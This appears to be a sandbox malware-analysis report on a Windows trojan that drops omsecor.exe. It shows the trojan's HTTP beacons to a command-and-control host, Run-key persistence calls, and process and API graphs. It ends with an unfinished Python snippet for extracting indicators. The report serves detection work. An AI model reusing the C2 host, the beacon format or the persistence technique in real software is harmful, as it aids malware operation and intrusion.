                Server: openresty
                Date: Thu, 05 Dec 2024 17:06:09 GMT
                Content-Type: text/html
                Content-Length: 114
                Connection: keep-alive
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                11 | 192.168.2.7 | 49969 | 52.34.198.229 | 80 | 1732 | C:\Windows\SysWOW64\omsecor.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 5, 2024 18:06:10.066677094 CET | 299 | OUT | GET /618/507.html HTTP/1.1
                From: 133778973683427860
                Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
                Host: ow5dirasuek.com
                Connection: Keep-Alive
                Cookie: snkz=8.46.123.228; btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418323|1733418276|23|2|0
                Dec 5, 2024 18:06:11.427999020 CET | 338 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Thu, 05 Dec 2024 17:06:11 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418371|1733418276|35|3|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0



                Target ID:1
                Start time:12:04:06
                Start date:05/12/2024
                Path:C:\Users\user\Desktop\cOviNFmw21.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\cOviNFmw21.exe"
                Imagebase:0x400000
                File size:65'536 bytes
                MD5 hash:73E5F0F01BF8368B8B82432B027610E5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:2
                Start time:12:04:06
                Start date:05/12/2024
                Path:C:\Users\user\AppData\Roaming\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\omsecor.exe
                Imagebase:0x400000
                File size:65'536 bytes
                MD5 hash:9CB842FFDA5CC91A433FD8C8655C0678
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 96%, ReversingLabs
                Reputation:low
                Has exited:true

                Target ID:11
                Start time:13:36:08
                Start date:05/12/2024
                Path:C:\Windows\SysWOW64\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\System32\omsecor.exe
                Imagebase:0x400000
                File size:65'536 bytes
                MD5 hash:647527DE20AF8BB173C26019E8811EED
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                Reputation:low
                Has exited:true

                Target ID:15
                Start time:13:37:43
                Start date:05/12/2024
                Path:C:\Windows\SysWOW64\omsecor.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\omsecor.exe /nomove
                Imagebase:0x400000
                File size:65'536 bytes
                MD5 hash:647527DE20AF8BB173C26019E8811EED
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                  Execution Graph

                  Execution Coverage:3.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:8.2%
                  Total number of Nodes:693
                  Total number of Limit Nodes:13
                  execution_graph 4029 405000 4039 405008 4029->4039 4032 40c5b9 SysFreeString 4033 405103 4032->4033 4034 40c5b9 SysFreeString 4033->4034 4035 405109 4034->4035 4036 40c5b9 SysFreeString 4035->4036 4037 405111 4036->4037 4038 40c5b9 SysFreeString 4037->4038 4040 405120 4038->4040 4046 4050f2 4039->4046 4047 40c43d 4039->4047 4043 4050e2 4045 40be3a HeapFree 4043->4045 4045->4046 4056 40c5b9 4046->4056 4059 40bf60 4047->4059 4050 4050ce 4050->4043 4052 40c00b 4050->4052 4051 40be3a HeapFree 4051->4050 4053 40c01a 4052->4053 4055 40c03b 4052->4055 4054 40bde1 3 API calls 4053->4054 4054->4055 4055->4043 4057 40c5c0 SysFreeString 4056->4057 4058 4050fb 4056->4058 4057->4058 4058->4032 4060 40bf72 4059->4060 4061 40bfbf 4060->4061 4063 40bfa7 wvnsprintfW 4060->4063 4064 40bde1 4060->4064 4061->4050 4061->4051 4063->4060 4065 40bdf2 4064->4065 4066 40bde5 4064->4066 4068 40be0c HeapReAlloc 4065->4068 4069 40bdfc HeapAlloc 4065->4069 4067 40be3a HeapFree 4066->4067 4070 40bdec 4067->4070 4068->4070 4069->4070 4070->4060 4071 409000 4073 40900a 4071->4073 4072 409040 4074 409043 SysFreeString 4072->4074 4073->4072 4073->4074 4075 409058 4073->4075 4076 40912b 4074->4076 4077 409091 GetTickCount 4075->4077 4078 40905f 4075->4078 4084 4090ae 4077->4084 4079 40906a SysAllocString 4078->4079 4082 40908f 4078->4082 4079->4078 4080 409108 SysFreeString 4080->4080 4081 40911b SysFreeString 4080->4081 4081->4076 4082->4080 4082->4081 4083 4090c7 SysAllocString 4083->4084 4084->4082 4084->4083 4085 409301 4086 409314 4085->4086 4087 40931f 4086->4087 4088 40933b CharLowerW 4086->4088 4092 409364 4086->4092 4089 409351 4088->4089 4090 409362 SysFreeString 4089->4090 4091 409359 SysFreeString 4089->4091 4090->4092 4091->4087 4092->4087 4093 4093ae SysAllocString SysAllocString 4092->4093 4094 4093d7 SysFreeString SysFreeString 4093->4094 4094->4087 4096 409581 4097 409591 4096->4097 4098 409595 4097->4098 4099 409599 CharLowerW 4097->4099 4100 4095fb 4099->4100 4102 
4095b3 4099->4102 4101 40960a SysFreeString 4100->4101 4102->4100 4102->4101 4103 4095d5 CharLowerW 4102->4103 4104 4095df 4103->4104 4105 409605 SysFreeString 4104->4105 4105->4101 4106 409402 4107 409415 4106->4107 4108 409419 4107->4108 4109 409437 SysFreeString 4107->4109 4109->4108 4110 409883 4111 409890 4110->4111 4116 409655 4111->4116 4114 409655 __VEC_memcpy 4115 4098c7 4114->4115 4118 40966d 4116->4118 4117 40970f 4117->4114 4117->4115 4118->4117 4119 40c5d0 __VEC_memcpy 4118->4119 4119->4117 3834 409445 3837 40945a 3834->3837 3835 40945e 3836 4094a0 SysFreeString SysFreeString 3836->3835 3837->3835 3837->3836 3838 40a345 3840 40a352 3838->3840 3839 40a378 3840->3839 3842 40a442 3840->3842 3844 40a245 3840->3844 3842->3839 3852 40a2d9 3842->3852 3845 40a262 _memset 3844->3845 3846 40a2d6 3844->3846 3847 40a270 SysAllocString SysAllocString 3845->3847 3846->3842 3848 40a2b3 3847->3848 3849 40a2c3 SysFreeString SysFreeString 3848->3849 3858 409fb1 3848->3858 3849->3846 3851 40a2c2 3851->3849 3853 40a2f4 3852->3853 3857 40a2f0 3852->3857 3854 40a313 3853->3854 3855 40a2fe GetProcessHeap HeapFree 3853->3855 3856 409c99 11 API calls 3854->3856 3855->3854 3856->3857 3857->3839 3867 40d258 3858->3867 3860 409fbd GetTickCount 3865 409fd3 3860->3865 3861 409fde GetTickCount 3862 409fea Sleep 3861->3862 3864 40a030 3861->3864 3863 409ff2 PeekMessageW 3862->3863 3863->3865 3866 40a005 DispatchMessageW 3863->3866 3864->3851 3865->3861 3865->3864 3866->3863 3867->3860 3498 40b346 3543 40d5b0 3498->3543 3501 40b37e 3528 40b3db 3501->3528 3590 40ac20 RegOpenKeyExW 3501->3590 3505 40b394 GetModuleFileNameW 3598 4069fd RegCreateKeyExW 3505->3598 3510 40b3f2 Sleep 3514 40a786 35 API calls 3510->3514 3511 40b3c5 3602 40a786 3511->3602 3512 40b3ca GetLastError 3512->3511 3516 40b407 GetModuleFileNameW 3514->3516 3518 40ac20 4 API calls 3516->3518 3517 40b45c 3520 40ac20 4 API calls 3517->3520 3529 40b3d8 3518->3529 3521 40b468 3520->3521 3526 407727 54 API calls 3521->3526 
3522 40b426 CopyFileW 3523 40b43f 3522->3523 3522->3528 3527 4077f0 CreateProcessW 3523->3527 3524 40b4b9 ExpandEnvironmentStringsW 3524->3528 3525 40b4cf GetModuleFileNameW 3525->3529 3530 40b474 3526->3530 3540 40b44b 3527->3540 3528->3510 3528->3517 3528->3524 3528->3525 3535 40b44c ExitProcess 3528->3535 3538 40b4fe GetLastError 3528->3538 3545 40b2ce OleInitialize 3528->3545 3554 40aafd 3528->3554 3563 40ab7c GetModuleFileNameW CharLowerW 3528->3563 3568 40abd9 3528->3568 3574 407727 3528->3574 3587 4077f0 3528->3587 3529->3522 3529->3528 3532 40b498 GetLastError 3530->3532 3533 40b47a 3530->3533 3534 40b4a3 3532->3534 3536 4077f0 CreateProcessW 3533->3536 3537 40a786 35 API calls 3534->3537 3539 40b486 3536->3539 3537->3540 3541 40a786 35 API calls 3538->3541 3539->3535 3542 40b48b GetLastError 3539->3542 3540->3535 3541->3529 3542->3534 3544 40b353 GetModuleFileNameW 3543->3544 3544->3501 3548 40b2e2 3545->3548 3549 40b325 InternetCloseHandle 3548->3549 3618 407552 3548->3618 3621 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 3548->3621 3626 40ac93 3548->3626 3643 40b096 3548->3643 3673 40a6c9 3549->3673 3555 40d5b0 3554->3555 3556 40ab0a GetCommandLineW 3555->3556 3557 40ab1a 3556->3557 3558 40ab1f 3557->3558 3559 40ac20 4 API calls 3557->3559 3558->3528 3560 40ab30 3559->3560 3560->3558 3561 40ab35 GetModuleFileNameW CharLowerW CharLowerW 3560->3561 3562 40ab73 3561->3562 3562->3558 3564 40abb6 3563->3564 3565 40abc0 GetCommandLineW 3564->3565 3566 40abbb 3564->3566 3567 40abd0 3565->3567 3566->3528 3567->3528 3569 40ac20 4 API calls 3568->3569 3570 40abf2 3569->3570 3571 40abf7 FindFirstFileW 3570->3571 3572 40ac1a 3570->3572 3571->3572 3573 40ac0e FindClose 3571->3573 3572->3528 3573->3572 3575 40d5b0 3574->3575 3576 407731 GetModuleFileNameW 3575->3576 3577 407753 3576->3577 3581 40776d 3576->3581 3578 4075d4 15 API calls 3577->3578 3582 407764 3578->3582 3579 407774 ExpandEnvironmentStringsW 3820 4075d4 CreateFileW 
3579->3820 3581->3579 3581->3582 3583 4077a7 GetLastError 3581->3583 3584 4077bc GetLastError 3581->3584 3582->3528 3586 4077ca 3583->3586 3584->3586 3585 40a786 35 API calls 3585->3586 3586->3581 3586->3585 3830 40d530 3587->3830 3589 407805 CreateProcessW 3589->3528 3591 40ac60 RegOpenKeyExW 3590->3591 3592 40ac4a 3590->3592 3593 40ac78 3591->3593 3594 40ac7c 3591->3594 3832 4069c0 RegQueryValueExW RegCloseKey 3592->3832 3593->3505 3593->3528 3833 4069c0 RegQueryValueExW RegCloseKey 3594->3833 3597 40ac5a 3597->3591 3597->3593 3599 406a30 3598->3599 3600 406a2c 3598->3600 3601 406a39 RegSetValueExW RegCloseKey 3599->3601 3600->3511 3600->3512 3601->3600 3604 40a79c 3602->3604 3605 40a7b3 3602->3605 3603 406d14 2 API calls 3603->3604 3604->3603 3604->3605 3606 40a79e Sleep 3604->3606 3607 406cb5 GetVersionExW 3605->3607 3606->3604 3608 40a83f 3607->3608 3609 4078cb 12 API calls 3608->3609 3610 40a873 3609->3610 3611 40a718 5 API calls 3610->3611 3615 40a87b 3611->3615 3612 40a744 5 API calls 3612->3615 3613 40a894 Sleep 3613->3615 3614 406e69 22 API calls 3614->3615 3615->3612 3615->3613 3615->3614 3616 40a8c7 Sleep 3615->3616 3617 40a8e1 GetProcessHeap HeapFree 3615->3617 3616->3615 3617->3529 3677 40584d 3618->3677 3620 407557 Sleep 3620->3548 3622 4073dd SystemTimeToFileTime SystemTimeToFileTime 3621->3622 3624 407432 3622->3624 3625 40745f SetWaitableTimer WaitForSingleObject CloseHandle 3624->3625 3625->3548 3678 406d14 InternetAttemptConnect 3626->3678 3628 40aca4 3629 40aca9 Sleep 3628->3629 3630 40acbd 3628->3630 3632 406d14 2 API calls 3629->3632 3681 4078cb 3630->3681 3632->3628 3633 40acd4 3688 406cb5 GetVersionExW 3633->3688 3635 40ad09 3690 40a718 3635->3690 3638 40ad71 Sleep 3640 40ad4c 3638->3640 3640->3638 3641 40ad9f Sleep 3640->3641 3642 40adbc 3640->3642 3694 40a744 3640->3694 3698 406e69 3640->3698 3641->3640 3642->3548 3644 40b0a3 3643->3644 3645 40b0bd 3644->3645 3646 40b0cf 3644->3646 3672 40b0ae 3644->3672 3802 407995 3645->3802 3809 407951 
Call graph (the rendered edge list is collapsed here to the functions it names and the Windows APIs each one reaches; addresses are in the 00400000-based image):
• 40b0cd-40b27c: GetModuleFileNameW, GetCurrentDirectoryW, InternetSetPerSiteCookieDecisionW, InternetClearAllPerSiteCookieDecisions, GetLastError, CreateThread, WaitForMultipleObjects, CloseHandle, InternetCloseHandle (via 40a6c9)
• 40a6cf: InternetCloseHandle, ExitProcess
• 406d14/406d26: InternetOpenW
• 4078cb/40782a: GetModuleFileNameW, CreateFileW, GetFileTime, CloseHandle, GetTickCount
• 407e2b: SetFilePointer, ReadFile; 407d61: SetFilePointer, WriteFile
• 407cd7: GetModuleFileNameW, GetCurrentDirectoryW, CreateFileW
• 406e69/406e76: GetTickCount, then 407b4e and 409c99
• 409c99: InternetOpenUrlW, GetProcessHeap, HeapAlloc, InternetReadFile, HeapReAlloc, HeapFree, __VEC_memcpy
• 407267 and 4072ed: GetSystemTime, SystemTimeToFileTime (twice), __aulldiv
• 4075d4/40760a: CreateFileW, GetFileSize, GetProcessHeap, RtlAllocateHeap, ReadFile, WriteFile, SetFilePointer, ReadFile, SetFilePointer, ReadFile, SetFilePointer, WriteFile, CloseHandle (twice)
• 409a07, 409c49, 409909, 40920a, 40978d, 409a99: SysAllocString (BSTR construction, partly via 409723/409655 __VEC_memcpy)
• 40d00b: IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ___report_gsfailure
• 40500c: SysFreeString (five times), HeapFree
• 40bfd0 and 40c05c: HeapAlloc (40be27); 40c290/40be54: HeapFree (40be3a)
• 40cbd0: __except_handler4, RtlUnwind
• 40d990 and 40d2a4/40d2ac: VirtualQuery, GetVersionExA, _ValidateScopeTableHandlers, __FindPESection, __except_handler3, __except_handler4, _CallDestructExceptionObject, RtlUnwind
• 407499: GetLocalTime (twice), GetTimeZoneInformation, SystemTimeToFileTime (twice)
• 40c519/40c4b4: CoCreateInstance, VariantInit, SysAllocString, VariantClear
• 409f99 and 40a65e: Sleep
• 406adf: RegOpenKeyExW (three keys), RegQueryValueExW, RegCloseKey (4069c0), 4069fd
• 406a68 and 406c77: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
• 409021: SysFreeString, GetTickCount, SysAllocString, SysFreeString
• 40a469: InternetOpenW, InternetSetOptionW
• 40a156/40a0b5: CoInitialize, GetModuleHandleW, CreateWindowExW, SysAllocString, GetForegroundWindow, CoCreateInstance, SetForegroundWindow, FindWindowW, SetParent, GetWindowLongW, SetWindowLongW, SetWindowPos
• 4053ea: HeapCreate, GetProcessHeap; 405136: ExpandEnvironmentStringsW, HeapFree, Sleep (three sites), then 409df4
• 409df4: WideCharToMultiByte, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, HeapFree, InternetReadFile, MultiByteToWideChar, HeapAlloc
• 409f2b: GetTickCount (twice), PeekMessageW, DispatchMessageW, Sleep
• 409c6f: SysFreeString
• 407036: DeleteFileW, CreateFileW, GetLastError, SetEndOfFile, InternetOpenUrlW, InternetQueryDataAvailable, InternetReadFile, WriteFile, CloseHandle, InternetCloseHandle
• 4094b6: CharLowerW (three sites), SysFreeString
• 40a8f9: Sleep, 4078cb (12 API calls), GetVersionExW, 40a718, 40a744, 406e69 (22 API calls), GetProcessHeap, HeapFree
• 40c3f9: wvnsprintfW
• 4091bd/40a582: SysAllocString, SysFreeString

                  Control-flow Graph

                  APIs
                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                  • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                  • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                  • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                  • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                  • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                  • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                  • CloseHandle.KERNELBASE(?), ref: 00407714
                  • CloseHandle.KERNEL32(?), ref: 00407719
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                  • String ID:
                  • API String ID: 2296163861-0
                  • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                  • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                  • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                  • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                  Control-flow Graph

                  • Basic blocks: 40abd9-40abf5 call 40ac20; 40abf7-40ac0c FindFirstFileW; 40ac0e-40ac18 FindClose (only when the find handle is valid); 40ac1a and 40ac1c-40ac1f return
                  APIs
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                  • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                  • FindClose.KERNEL32(00000000), ref: 0040AC0F
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: FindOpen$CloseFileFirst
                  • String ID:
                  • API String ID: 3155378417-0
                  • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                  • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                  Control-flow Graph

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,00000400,?,?,?,0040B3BC,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run), ref: 00406A22
                  • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                  • Sleep.KERNEL32(00002710), ref: 0040B3F7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                  • ExitProcess.KERNEL32 ref: 0040B44D
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                  • GetLastError.KERNEL32(00000004), ref: 0040B48D
                  • GetLastError.KERNEL32(00000004), ref: 0040B49A
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                  • GetLastError.KERNEL32(00000004), ref: 0040B500
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                  • API String ID: 3692109554-477663111
                  • Opcode ID: 27e6cc8fbb92a4a1dc8a331001041fcfa920682934159512c1d60e9f15f909f3
                  • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                  • Opcode Fuzzy Hash: 27e6cc8fbb92a4a1dc8a331001041fcfa920682934159512c1d60e9f15f909f3
                  • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                  Control-flow Graph

                  • Basic blocks: 40ac20-40ac48 RegOpenKeyExW (HKCU Run key), 40ac4a-40ac55 call 4069c0 on success; 40ac60-40ac76 RegOpenKeyExW (HKLM Run key), 40ac7c-40ac87 call 4069c0 on success; 40ac8e-40ac92 return
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                  • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  • API String ID: 3546245721-4228964922
                  • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                  • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779
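                  The three entries above for 004075D4 (file copy with 0x40- and 0xF8-byte header reads), 0040AC20 (Run-key lookup under HKCU and HKLM) and 0040B36C (CopyFileW, RegCreateKeyExW on the Run key, ExitProcess, strings "IueiOod", "opeqmc.exe", "/nomove") are what an analyst would turn into host-side indicators. The following Python is an added example written for this page, not Joe Sandbox code and not code from the sample: it parses API-call lines in the report's own "APIs" list format, decodes the CreateFileW access/disposition constants and the RegOpenKeyExW hive, annotates transfer sizes that coincide with PE header structures (0x40 is sizeof(IMAGE_DOS_HEADER), 0xF8 is sizeof(IMAGE_NT_HEADERS32); this is a hint for the reader, not a claim about what the routine does), and derives persistence IOCs that it then matches against a constructed Run-key listing. The sample lines are copied from the report; the C:\Windows path in the constructed Run entry is an assumption, only the file name comes from the report.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# Constructed sample: API-call lines in the report's own "APIs" list format,
# copied from the 004075D4, 0040AC20 and 0040B36C entries, plus the
# "String ID" line of the 0040B36C entry.
SAMPLE_API_LINES = r"""
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
• CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
• ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
• ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
• WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
• RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
• RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
• CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
• ExitProcess.KERNEL32 ref: 0040B44D
"""
SAMPLE_STRING_ID = r"/nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe"

# Constructed Run-key listing (what reg.exe or a triage script would export).
# The C:\Windows path is an assumption; only the file name is in the report.
SAMPLE_RUN_ENTRIES = [
    {"key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "name": "OneDrive",
     "data": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "name": "IueiOod",
     "data": r"C:\Windows\opeqmc.exe /nomove"},
]

API_LINE = re.compile(
    r"^[•\s]*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HIVES = {0x80000001: "HKCU", 0x80000002: "HKLM"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
# Sizes that coincide with PE header structures: an analyst hint only.
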